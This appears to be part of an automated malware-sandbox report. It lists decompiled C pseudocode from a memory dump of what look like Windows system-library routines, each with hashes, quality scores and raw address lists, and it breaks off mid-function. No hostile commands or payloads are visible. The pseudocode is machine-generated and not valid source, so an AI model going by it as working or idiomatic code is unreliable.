0x010cefe5 0x0111bafc 0x0111bafc 0x010cefe5 0x010cefeb 0x010cefed 0x010cf00f 0x010cf011 0x010cf01a 0x010cf01d 0x010cf021 0x010cf028 0x010cf029 0x010cf029 0x010cf02c 0x00000000 0x010cf02c 0x010ceff3 0x010ceff9 0x010cf0ea 0x010cf0ed 0x010cf0ef 0x00000000 0x010cf0ef 0x010cf003 0x0111bb12 0x010cf045 0x010cf049 0x010cf051 0x010cf09e 0x010cf0a0 0x010cf0a0 0x010cf09e 0x010cf053 0x010cf064 0x010cf064 0x010cf06b 0x0111bb1a 0x0111bb1a 0x010cf071 0x010cf071 0x010cf07d 0x010cf082 0x010cf08f 0x010cf08f 0x010cf009 0x010cf00d 0x00000000 0x010cf00d 0x010cefd0 0x010cef97 0x010cefa5 0x010cefaa 0x00000000 0x010cefac 0x010cefac 0x010cefac 0x00000000 0x010cefb2 0x010cf036 0x010cf03a 0x010cf040 0x010cf090 0x00000000 0x010cf092 0x010cf042 0x00000000 0x010cf042 0x010cefb7 0x010cefb9 0x010cefbc 0x010cefb0 0x010cefb0 0x00000000 0x010cefbe 0x010cefbe 0x010cefc1 0x00000000 0x010cefc1 0x010cefbc 0x010cefaa 0x010cef91

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0 Instruction ID: 30ed03d1459d3a731bd4a513b4119855131c8f8f6e68ea7e2a9b930d117e532e Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0 Instruction Fuzzy Hash: A551C530A0424A9FEB25CB68C1D47EEBFF2AF05B14F2481EDD58557282C375A989CF52

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 84%

E0118740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) { signed short* _v8; intOrPtr _v12; intOrPtr _t55; void* _t56; intOrPtr* _t66; intOrPtr* _t69; void* _t74; intOrPtr* _t78; intOrPtr* _t81; intOrPtr* _t82; intOrPtr _t83; signed short* _t84; intOrPtr _t85; signed int _t87; intOrPtr* _t90; intOrPtr* _t93; intOrPtr* _t94; void* _t98; _t84 = __edx; _t80 = __ecx; _push(__ecx); _push(__ecx); _t55 = __ecx; _v8 = __edx; _t87 = *__edx & 0x0000ffff; _v12 = __ecx; _t3 = _t55 + 0x154; // 0x154 _t93 = _t3; _t78 = *_t93; _t4 = _t87 + 2; // 0x2 _t56 = _t4; while(_t78 != _t93) { if( *((intOrPtr*)(_t78 + 0x14)) != _t56) { L4: _t78 = *_t78; continue; } else { _t7 = _t78 + 0x18; // 0x18 if(E0110D4F0(_t7, _t84[2], _t87) == _t87) { _t40 = _t78 + 0xc; // 0xc _t94 = _t40; _t90 = *_t94; while(_t90 != _t94) { _t41 = _t90 + 8; // 0x8 _t74 = E010FF380(_a4, _t41, 0x10); _t98 = _t98 + 0xc; if(_t74 != 0) { _t90 = *_t90; continue; } goto L12; } _t82 = L010D4620(_t80, *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18); if(_t82 != 0) { _t46 = _t78 + 0xc; // 0xc _t69 = _t46; asm("movsd"); asm("movsd"); asm("movsd"); asm("movsd"); _t85 = *_t69; if( *((intOrPtr*)(_t85 + 4)) != _t69) { L20: _t82 = 3; asm("int 0x29"); } *((intOrPtr*)(_t82 + 4)) = _t69; *_t82 = _t85; *((intOrPtr*)(_t85 + 4)) = _t82; *_t69 = _t82; *(_t78 + 8) = *(_t78 + 8) + 1; *(_v12 + 0xdc) = *(_v12 + 0xdc) | 0x00000010; goto L11; } else { L18: _push(0xe); _pop(0); } } else { _t84 = _v8; _t9 = _t87 + 2; // 0x2 _t56 = _t9; goto L4; } } L12: return 0; } _t10 = _t87 + 0x1a; // 0x1a _t78 = L010D4620(_t80, *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10); if(_t78 == 0) { goto L18; } else { _t12 = _t87 + 2; // 0x2 *((intOrPtr*)(_t78 + 0x14)) = _t12; _t16 = _t78 + 0x18; // 0x18 E010FF3E0(_t16, _v8[2], _t87); *((short*)(_t78 + _t87 + 0x18)) = 0; _t19 = _t78 + 0xc; // 0xc _t66 = _t19; *((intOrPtr*)(_t66 + 4)) = _t66; *_t66 = _t66; *(_t78 + 8) = *(_t78 + 8) & 0x00000000; _t81 = L010D4620(_t80, *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18); if(_t81 == 0) { goto L18; } else { _t26 = _t78 + 0xc; // 0xc _t69 = _t26; asm("movsd"); asm("movsd"); asm("movsd"); asm("movsd"); _t85 = *_t69; if( *((intOrPtr*)(_t85 + 4)) != _t69) { goto L20; } else { *((intOrPtr*)(_t81 + 4)) = _t69; *_t81 = _t85; *((intOrPtr*)(_t85 + 4)) = _t81; *_t69 = _t81; _t83 = _v12; *(_t78 + 8) = 1; *(_t83 + 0xdc) = *(_t83 + 0xdc) | 0x00000010; _t34 = _t83 + 0x154; // 0x1ba _t69 = _t34; _t85 = *_t69; if( *((intOrPtr*)(_t85 + 4)) != _t69) { goto L20; } else { *_t78 = _t85; *((intOrPtr*)(_t78 + 4)) = _t69; *((intOrPtr*)(_t85 + 4)) = _t78; *_t69 = _t78; *(_t83 + 0xdc) = *(_t83 + 0xdc) | 0x00000010; } } goto L11; } } goto L12; } 0x0118740d 0x0118740d 0x01187412 0x01187413 0x01187416 0x01187418 0x0118741c 0x0118741f 0x01187422 0x01187422 0x01187428 0x0118742a 0x0118742a 0x01187451 0x01187432 0x0118744f 0x0118744f 0x00000000 0x01187434 0x01187438 0x01187443 0x01187517 0x01187517 0x0118751a 0x01187535 0x01187520 0x01187527 0x0118752c 0x01187531 0x01187533 0x00000000 0x01187533 0x00000000 0x01187531 0x0118754b 0x0118754f 0x0118755c 0x0118755c 0x0118755f 0x01187560 0x01187561 0x01187562 0x01187563 0x01187568 0x0118756a 0x0118756c 0x0118756d 0x0118756d 0x0118756f 0x01187572 0x01187574 0x01187577 0x0118757c 0x0118757f 0x00000000 0x01187551 0x01187551 0x01187551 0x01187553 0x01187553 0x01187449 0x01187449 0x0118744c 0x0118744c 0x00000000 0x0118744c 0x01187443 0x0118750e 0x01187514 0x01187514 0x01187455 0x01187469 0x0118746d 0x00000000 0x01187473 0x01187473 0x01187476 0x01187480 0x01187484 0x0118748e 0x01187493 0x01187493 0x01187496 0x01187499 0x011874a1 0x011874b1 0x011874b5 0x00000000 0x011874bb 0x011874c1 0x011874c1 0x011874c4 0x011874c5 0x011874c6 0x011874c7 0x011874c8 0x011874cd 0x00000000 0x011874d3 0x011874d3 0x011874d6 0x011874d8 0x011874db 0x011874dd 0x011874e0 0x011874e7 0x011874ee 0x011874ee 0x011874f4 0x011874f9 0x00000000 0x011874fb 0x011874fb 0x011874fd 0x01187500 0x01187503 0x01187505 0x01187505 0x011874f9 0x00000000 0x011874cd 0x011874b5 0x00000000

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec Instruction ID: 01d9829d4a3f92820c04b876cbb0ecf4c4a9e5b5e37ad8f7c10902ce09be9dcd Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec Instruction Fuzzy Hash: 92519E71600646EFDB1ADF58D480A96BBB5FF45304F25C0AAE908DF252E371E946CFA0

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 97%

E010E2990() { signed int* _t62; signed int _t64; intOrPtr _t66; signed short* _t69; intOrPtr _t76; signed short* _t79; void* _t81; signed int _t82; signed short* _t83; signed int _t87; intOrPtr _t91; void* _t98; signed int _t99; void* _t101; signed int* _t102; void* _t103; void* _t104; void* _t107; _push(0x20); _push(0x118ff00); E0110D08C(_t81, _t98, _t101); *((intOrPtr*)(_t103 - 0x28)) = *[fs:0x18]; _t99 = 0; *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0; _t82 = *((intOrPtr*)(_t103 + 0x10)); if(_t82 == 0) { _t62 = 0xc0000100; } else { *((intOrPtr*)(_t103 - 4)) = 0; _t102 = 0xc0000100; *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100; _t64 = 4; while(1) { *(_t103 - 0x24) = _t64; if(_t64 == 0) { break; } _t87 = _t64 * 0xc; *(_t103 - 0x2c) = _t87; _t107 = _t82 - *((intOrPtr*)(_t87 + 0x1091664)); if(_t107 <= 0) { if(_t107 == 0) { _t79 = E010FE5C0( *((intOrPtr*)(_t103 + 0xc)), *((intOrPtr*)(_t87 + 0x1091668)), _t82); _t104 = _t104 + 0xc; __eflags = _t79; if(__eflags == 0) { _t102 = E011351BE(_t82, *((intOrPtr*)( *(_t103 - 0x2c) + 0x109166c)), *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags, *((intOrPtr*)(_t103 + 0x18)), *((intOrPtr*)(_t103 + 0x1c))); *((intOrPtr*)(_t103 - 0x30)) = _t102; break; } else { _t64 = *(_t103 - 0x24); goto L5; } goto L13; } else { L5: _t64 = _t64 - 1; continue; } } break; } *((intOrPtr*)(_t103 - 0x1c)) = _t102; __eflags = _t102; if(_t102 < 0) { __eflags = _t102 - 0xc0000100; if(_t102 == 0xc0000100) { _t83 = *((intOrPtr*)(_t103 + 8)); __eflags = _t83; if(_t83 != 0) { *((intOrPtr*)(_t103 - 0x20)) = _t83; __eflags = *_t83 - _t99; if( *_t83 == _t99) { _t102 = 0xc0000100; goto L19; } else { _t91 = *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)); _t66 = *((intOrPtr*)(_t91 + 0x10)); __eflags = *((intOrPtr*)(_t66 + 0x48)) - _t83; if( *((intOrPtr*)(_t66 + 0x48)) == _t83) { __eflags = *((intOrPtr*)(_t91 + 0x1c)); if( *((intOrPtr*)(_t91 + 0x1c)) == 0) { L26: _t102 = E010E2AE4(_t103 - 0x20, *((intOrPtr*)(_t103 + 0xc)), _t82, *((intOrPtr*)(_t103 + 0x14)), *((intOrPtr*)(_t103 + 0x18)), *((intOrPtr*)(_t103 + 0x1c))); *((intOrPtr*)(_t103 - 0x1c)) = _t102; __eflags = _t102 - 0xc0000100; if(_t102 != 0xc0000100) { goto L12; } else { _t99 = 1; _t83 = *((intOrPtr*)(_t103 - 0x20)); goto L18; } } else { _t69 = E010C6600( *((intOrPtr*)(_t91 + 0x1c))); __eflags = _t69; if(_t69 != 0) { goto L26; } else { _t83 = *((intOrPtr*)(_t103 + 8)); goto L18; } } } else { L18: _t102 = E010E2C50(_t83, *((intOrPtr*)(_t103 + 0xc)), _t82, *((intOrPtr*)(_t103 + 0x14)), *((intOrPtr*)(_t103 + 0x18)), *((intOrPtr*)(_t103 + 0x1c)), _t99); L19: *((intOrPtr*)(_t103 - 0x1c)) = _t102; goto L12; } } L28: } else { E010CEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c))); *((intOrPtr*)(_t103 - 4)) = 1; *((intOrPtr*)(_t103 - 0x20)) = *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48)); _t102 = *((intOrPtr*)(_t103 + 0x1c)); _t76 = E010E2AE4(_t103 - 0x20, *((intOrPtr*)(_t103 + 0xc)), _t82, *((intOrPtr*)(_t103 + 0x14)), *((intOrPtr*)(_t103 + 0x18)), _t102); *((intOrPtr*)(_t103 - 0x1c)) = _t76; __eflags = _t76 - 0xc0000100; if(_t76 == 0xc0000100) { *((intOrPtr*)(_t103 - 0x1c)) = E010E2C50( *((intOrPtr*)(_t103 - 0x20)), *((intOrPtr*)(_t103 + 0xc)), _t82, *((intOrPtr*)(_t103 + 0x14)), *((intOrPtr*)(_t103 + 0x18)), _t102, 1); } *((intOrPtr*)(_t103 - 4)) = _t99; E010E2ACB(); } } } L12: *((intOrPtr*)(_t103 - 4)) = 0xfffffffe; _t62 = _t102; } L13: return E0110D0D1(_t62); goto L28; } 0x010e2990 0x010e2992 0x010e2997 0x010e29a3 0x010e29a6 0x010e29ab 0x010e29ad 0x010e29b2 0x01125c80 0x010e29b8 0x010e29b8 0x010e29bb 0x010e29c0 0x010e29c5 0x010e29c6 0x010e29c6 0x010e29cb 0x00000000 0x00000000 0x010e29cd 0x010e29d0 0x010e29d9 0x010e29db 0x010e29dd 0x010e2a7f 0x010e2a84 0x010e2a87 0x010e2a89 0x01125ca1 0x01125ca3 0x00000000 0x010e2a8f 0x010e2a8f 0x00000000 0x010e2a8f 0x00000000 0x010e29e3 0x010e29e3 0x010e29e3 0x00000000 0x010e29e3 0x010e29dd 0x00000000 0x010e29db 0x010e29e6 0x010e29e9 0x010e29eb 0x010e29ed 0x010e29f3 0x010e29f5 0x010e29f8 0x010e29fa 0x010e2a97 0x010e2a9a 0x010e2a9d 0x010e2add 0x00000000 0x010e2a9f 0x010e2aa2 0x010e2aa5 0x010e2aa8 0x010e2aab 0x01125cab 0x01125caf 0x01125cc5 0x01125cda 0x01125cdc 0x01125cdf 0x01125ce5 0x00000000 0x01125ceb 0x01125ced 0x01125cee 0x00000000 0x01125cee 0x01125cb1 0x01125cb4 0x01125cb9 0x01125cbb 0x00000000 0x01125cbd 0x01125cbd 0x00000000 0x01125cbd 0x01125cbb 0x010e2ab1 0x010e2ab1 0x010e2ac4 0x010e2ac6 0x010e2ac6 0x00000000 0x010e2ac6 0x010e2aab 0x00000000 0x010e2a00 0x010e2a09 0x010e2a0e 0x010e2a21 0x010e2a24 0x010e2a35 0x010e2a3a 0x010e2a3d 0x010e2a42 0x010e2a59 0x010e2a59 0x010e2a5c 0x010e2a5f 0x010e2a5f 0x010e29fa 0x010e29f3 0x010e2a64 0x010e2a64 0x010e2a6b 0x010e2a6b 0x010e2a6d 0x010e2a72 0x00000000

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: f34631dbbc6e296ab20a2fb28b92dc9b118afe0808b3aa0e15024694215602bb Instruction ID: 71765e537d7e8e5d8238f542309d739a7fad22ef174d3caea94e03d13f1771ff Opcode Fuzzy Hash: f34631dbbc6e296ab20a2fb28b92dc9b118afe0808b3aa0e15024694215602bb Instruction Fuzzy Hash: 6D519E3190021ADFDF25DF9AC884ADEBBF9BF48350F098159E944AB250D7319D52CF90

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 78%

E010E4D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) { signed int _v12; char _v176; char _v177; char _v184; intOrPtr _v192; intOrPtr _v196; void* __ebx; void* __edi; void* __esi; signed short _t42; char* _t44; intOrPtr _t46; intOrPtr _t50; char* _t57; intOrPtr _t59; intOrPtr _t67; signed int _t69; _t64 = __edx; _v12 = *0x11ad360 ^ _t69; _t65 = 0xa0; _v196 = __edx; _v177 = 0; _t67 = __ecx; _v192 = __ecx; E010FFA60( &_v176, 0, 0xa0); _t57 = &_v176; _t59 = 0xa0; if( *0x11a7bc8 != 0) { L3: while(1) { asm("movsd"); asm("movsd"); asm("movsd"); asm("movsd"); _t67 = _v192; *((intOrPtr*)(_t57 + 0x10)) = _a4; *(_t57 + 0x24) = *(_t57 + 0x24) & 0x00000000; *(_t57 + 0x14) = *(_t67 + 0x34) & 0x0000ffff; *((intOrPtr*)(_t57 + 0x20)) = _v196; _push( &_v184); _push(_t59); _push(_t57); _push(0xa0); _push(_t57); _push(0xf); _t42 = E010FB0B0(); if(_t42 != 0xc0000023) { break; } if(_v177 != 0) { L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57); } _v177 = 1; _t44 = L010D4620(_t59, *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184); _t59 = _v184; _t57 = _t44; if(_t57 != 0) { continue; } else { _t42 = 0xc0000017; break; } } if(_t42 != 0) { _t65 = E010BCCC0(_t42); if(_t65 != 0) { L10: if(_v177 != 0) { if(_t57 != 0) { L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57); } } _t46 = _t65; L12: return E010FB640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67); } L7: _t50 = _a4; *((intOrPtr*)(_t67 + 0x30)) = *((intOrPtr*)(_t57 + 0x18)); if(_t50 != 3) { if(_t50 == 2) { goto L8; } L9: if(E010FF380(_t67 + 0xc, 0x1095138, 0x10) == 0) { *0x11a60d8 = _t67; } goto L10; } L8: _t64 = _t57 + 0x28; E010E4F49(_t67, _t57 + 0x28); goto L9; } _t65 = 0; goto L7; } if(E010E4E70(0x11a86b0, 0x10e5690, 0, 0) != 0) { _t46 = E010BCCC0(_t56); goto L12; } else { _t59 = 0xa0; goto L3; } } 0x010e4d3b 0x010e4d4d 0x010e4d53 0x010e4d58 0x010e4d65 0x010e4d6c 0x010e4d71 0x010e4d77 0x010e4d7f 0x010e4d8c 0x010e4d8e 0x010e4dad 0x010e4db0 0x010e4db7 0x010e4db8 0x010e4db9 0x010e4dba 0x010e4dbb 0x010e4dc1 0x010e4dc8 0x010e4dcc 0x010e4dd5 0x010e4dde 0x010e4ddf 0x010e4de0 0x010e4de1 0x010e4de6 0x010e4de7 0x010e4de9 0x010e4df3 0x00000000 0x00000000 0x01126c7c 0x01126c8a 0x01126c8a 0x01126c9d 0x01126ca7 0x01126cac 0x01126cb2 0x01126cb9 0x00000000 0x01126cbf 0x01126cbf 0x00000000 0x01126cbf 0x01126cb9 0x010e4dfb 0x01126ccf 0x01126cd3 0x010e4e32 0x010e4e39 0x01126ce0 0x01126cf2 0x01126cf2 0x01126ce0 0x010e4e3f 0x010e4e41 0x010e4e51 0x010e4e51 0x010e4e03 0x010e4e03 0x010e4e09 0x010e4e0f 0x010e4e57 0x00000000 0x00000000 0x010e4e1b 0x010e4e30 0x010e4e5b 0x010e4e5b 0x00000000 0x010e4e30 0x010e4e11 0x010e4e11 0x010e4e16 0x00000000 0x010e4e16 0x010e4e01 0x00000000 0x010e4e01 0x010e4da5 0x01126c6b 0x00000000 0x010e4dab 0x010e4dab 0x00000000 0x010e4dab

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: 20cd7d1e7d62c0cf057e1fe0dfba800835262d9c66ecc085f5912b20738df2a6 Instruction ID: fa9496a5689beb1e23bce0c180418118adee327b11ef649d547bec3b048f9240 Opcode Fuzzy Hash: 20cd7d1e7d62c0cf057e1fe0dfba800835262d9c66ecc085f5912b20738df2a6 Instruction Fuzzy Hash: 5841E171A443189FEB36DF19CC84BAAB7E9EB54710F0000AAE985DB381D770DD84CB91

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 85%

E010E4BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) { signed int _v8; short _v20; intOrPtr _v24; intOrPtr _v28; intOrPtr _v32; char _v36; char _v156; short _v158; intOrPtr _v160; char _v164; intOrPtr _v168; void* __ebx; void* __edi; void* __esi; signed int _t45; intOrPtr _t74; signed char _t77; intOrPtr _t84; char* _t85; void* _t86; intOrPtr _t87; signed short _t88; signed int _t89; _t83 = __edx; _v8 = *0x11ad360 ^ _t89; _t45 = _a8 & 0x0000ffff; _v158 = __edx; _v168 = __ecx; if(_t45 == 0) { L22: _t86 = 6; L12: E010BCC50(_t86); L11: return E010FB640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86); } _t77 = _a4; if((_t77 & 0x00000001) != 0) { goto L22; } _t8 = _t77 + 0x34; // 0xdce0ba00 if(_t45 != *_t8) { goto L22; } _t9 = _t77 + 0x24; // 0x11a8504 E010D2280(_t9, _t9); _t87 = 0x78; *(_t77 + 0x2c) = *( *[fs:0x18] + 0x24); E010FFA60( &_v156, 0, _t87); _t13 = _t77 + 0x30; // 0x3db8 _t85 = &_v156; _v36 = *_t13; _v28 = _v168; _v32 = 0; _v24 = 0; _v20 = _v158; _v160 = 0; while(1) { _push( &_v164); _push(_t87); _push(_t85); _push(0x18); _push( &_v36); _push(0x1e); _t88 = E010FB0B0(); if(_t88 != 0xc0000023) { break; } if(_t85 != &_v156) { L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85); } _t84 = L010D4620(0, *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164); _v168 = _v164; if(_t84 == 0) { _t88 = 0xc0000017; goto L19; } else { _t74 = _v160 + 1; _v160 = _t74; if(_t74 >= 0x10) { L19: _t86 = E010BCCC0(_t88); if(_t86 != 0) { L8: *(_t77 + 0x2c) = *(_t77 + 0x2c) & 0x00000000; _t30 = _t77 + 0x24; // 0x11a8504 E010CFFB0(_t77, _t84, _t30); if(_t84 != 0 && _t84 != &_v156) { L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84); } if(_t86 != 0) { goto L12; } else { goto L11; } } L6: *(_t77 + 0x36) = *(_t77 + 0x36) | 0x00004000; if(_v164 != 0) { _t83 = _t84; E010E4F49(_t77, _t84); } goto L8; } _t87 = _v168; continue; } } if(_t88 != 0) { goto L19; } goto L6; } 0x010e4bad 0x010e4bbf 0x010e4bc2 0x010e4bc6 0x010e4bcd 0x010e4bd9 0x011267fe 0x01126800 0x010e4ccc 0x010e4ccd 0x010e4cb7 0x010e4cc9 0x010e4cc9 0x010e4bdf 0x010e4be5 0x00000000 0x00000000 0x010e4beb 0x010e4bef 0x00000000 0x00000000 0x010e4bf5 0x010e4bf9 0x010e4c06 0x010e4c0b 0x010e4c17 0x010e4c1c 0x010e4c1f 0x010e4c25 0x010e4c33 0x010e4c3d 0x010e4c40 0x010e4c43 0x010e4c47 0x010e4c4d 0x010e4c53 0x010e4c54 0x010e4c55 0x010e4c56 0x010e4c5b 0x010e4c5c 0x010e4c63 0x010e4c6b 0x00000000 0x00000000 0x01126776 0x01126784 0x01126784 0x0112679f 0x011267a7 0x011267af 0x011267ce 0x00000000 0x011267b1 0x011267b7 0x011267b8 0x011267c1 0x011267d3 0x011267d9 0x011267dd 0x010e4c94 0x010e4c94 0x010e4c98 0x010e4c9c 0x010e4ca3 0x011267f4 0x011267f4 0x010e4cb5 0x00000000 0x00000000 0x00000000 0x00000000 0x010e4cb5 0x010e4c79 0x010e4c7e 0x010e4c89 0x010e4c8b 0x010e4c8f 0x010e4c8f 0x00000000 0x010e4c89 0x011267c3 0x00000000 0x011267c3 0x011267af 0x010e4c73 0x00000000 0x00000000 0x00000000

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: af6a05c3fbdf45061b899e3717a791b4aada176fe676da9753ef97d270429bda Instruction ID: 8e3565b8f7040a8c6efe0d8cff5b7f3d8155650af3a73051d9f55b833b650e9a Opcode Fuzzy Hash: af6a05c3fbdf45061b899e3717a791b4aada176fe676da9753ef97d270429bda Instruction Fuzzy Hash: 0941CE32A006299FDB61DF68C944BEEB7F4EF55700F0104A9E948EB241EB349E90CB91

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 94%

E010C8A0A(intOrPtr* __ecx, signed int __edx) { signed int _v8; char _v524; signed int _v528; void* _v532; char _v536; char _v540; char _v544; intOrPtr* _v548; void* __ebx; void* __edi; void* __esi; signed int _t44; void* _t46; void* _t48; signed int _t53; signed int _t55; intOrPtr* _t62; void* _t63; unsigned int _t75; signed int _t79; unsigned int _t81; unsigned int _t83; signed int _t84; void* _t87; _t76 = __edx; _v8 = *0x11ad360 ^ _t84; _v536 = 0x200; _t79 = 0; _v548 = __edx; _v544 = 0; _t62 = __ecx; _v540 = 0; _v532 = &_v524; if(__edx == 0 || __ecx == 0) { L6: return E010FB640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81); } else { _v528 = 0; E010CE9C0(1, __ecx, 0, 0, &_v528); _t44 = _v528; _t81 = *(_t44 + 0x48) & 0x0000ffff; _v528 = *(_t44 + 0x4a) & 0x0000ffff; _t46 = 0xa; _t87 = _t81 - _t46; if(_t87 > 0 || _t87 == 0) { *_v548 = 0x1091180; L5: _t79 = 1; goto L6; } else { _t48 = E010E1DB5(_t62, &_v532, &_v536); _t76 = _v528; if(_t48 == 0) { L9: E010F3C2A(_t81, _t76, &_v544); *_v548 = _v544; goto L5; } _t62 = _v532; if(_t62 != 0) { _t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff); _t53 = *_t62; _v528 = _t53; if(_t53 != 0) { _t63 = _t62 + 4; _t55 = _v528; do { if( *((intOrPtr*)(_t63 + 0x10)) == 1) { if(E010C8999(_t63, &_v540) == 0) { _t55 = _v528; } else { _t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff); _t55 = _v528; if(_t75 >= _t83) { _t83 = _t75; } } } _t63 = _t63 + 0x14; _t55 = _t55 - 1; _v528 = _t55; } while (_t55 != 0); _t62 = _v532; } if(_t62 != &_v524) { L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62); } _t76 = _t83 & 0x0000ffff; _t81 = _t83 >> 0x10; } goto L9; } } } 0x010c8a0a 0x010c8a1c 0x010c8a23 0x010c8a2e 0x010c8a30 0x010c8a36 0x010c8a3c 0x010c8a3e 0x010c8a4a 0x010c8a52 0x010c8a9c 0x010c8aae 0x010c8a58 0x010c8a5e 0x010c8a6a 0x010c8a6f 0x010c8a75 0x010c8a7d 0x010c8a85 0x010c8a86 0x010c8a89 0x010c8a93 0x010c8a99 0x010c8a9b 0x00000000 0x010c8aaf 0x010c8abe 0x010c8ac3 0x010c8acb 0x010c8ad7 0x010c8ae0 0x010c8af1 0x00000000 0x010c8af1 0x010c8acd 0x010c8ad5 0x010c8afb 0x010c8afd 0x010c8aff 0x010c8b07 0x010c8b22 0x010c8b24 0x010c8b2a 0x010c8b2e 0x010c8b3f 0x010c8b78 0x010c8b41 0x010c8b52 0x010c8b54 0x010c8b5c 0x010c8b74 0x010c8b74 0x010c8b5c 0x010c8b3f 0x010c8b5e 0x010c8b61 0x010c8b64 0x010c8b64 0x010c8b6c 0x010c8b6c 0x010c8b11 0x01119cd5 0x01119cd5 0x010c8b17 0x010c8b1a 0x010c8b1a 0x00000000 0x010c8ad5 0x010c8a89

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: c7e51afec23a1e8897955a121205133e1c9b9a46fe6fd57cd4e096306c7dd8f0 Instruction ID: 8a9bc9a9c6cb7eb39db02225e304ffa59884539b76c8ff9c534e2baff065a75c Opcode Fuzzy Hash: c7e51afec23a1e8897955a121205133e1c9b9a46fe6fd57cd4e096306c7dd8f0 Instruction Fuzzy Hash: 5C4160B0A0022D9BDB64DF59C888AEEB7F4FB54700F1085EED95997252E7709E80CF64

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 69%

E011369A6(signed short* __ecx, void* __eflags) { signed int _v8; signed int _v16; intOrPtr _v20; signed int _v24; signed short _v28; signed int _v32; intOrPtr _v36; signed int _v40; char* _v44; signed int _v48; intOrPtr _v52; signed int _v56; char _v60; signed int _v64; char _v68; char _v72; signed short* _v76; signed int _v80; char _v84; void* __ebx; void* __edi; void* __esi; void* _t68; intOrPtr _t73; signed short* _t74; void* _t77; void* _t78; signed int _t79; signed int _t80; _v8 = *0x11ad360 ^ _t80; _t75 = 0x100; _v64 = _v64 & 0x00000000; _v76 = __ecx; _t79 = 0; _t68 = 0; _v72 = 1; _v68 = *((intOrPtr*)( *[fs:0x18] + 0x20)); _t77 = 0; if(L010C6C59(__ecx[2], 0x100, __eflags) != 0) { _t79 = *((intOrPtr*)( *[fs:0x30] + 0x1e8)); if(_t79 != 0 && E01136BA3() != 0) { _push(0); _push(0); _push(0); _push(0x1f0003); _push( &_v64); if(E010F9980() >= 0) { E010D2280(_t56, 0x11a8778); _t77 = 1; _t68 = 1; if( *0x11a8774 == 0) { asm("cdq"); *(_t79 + 0xf70) = _v64; *(_t79 + 0xf74) = 0x100; _t75 = 0; _t73 = 4; _v60 = &_v68; _v52 = _t73; _v36 = _t73; _t74 = _v76; _v44 = &_v72; *0x11a8774 = 1; _v56 = 0; _v28 = _t74[2]; _v48 = 0; _v20 = ( *_t74 & 0x0000ffff) + 2; _v40 = 0; _v32 = 0; _v24 = 0; _v16 = 0; if(E010BB6F0(0x109c338, 0x109c288, 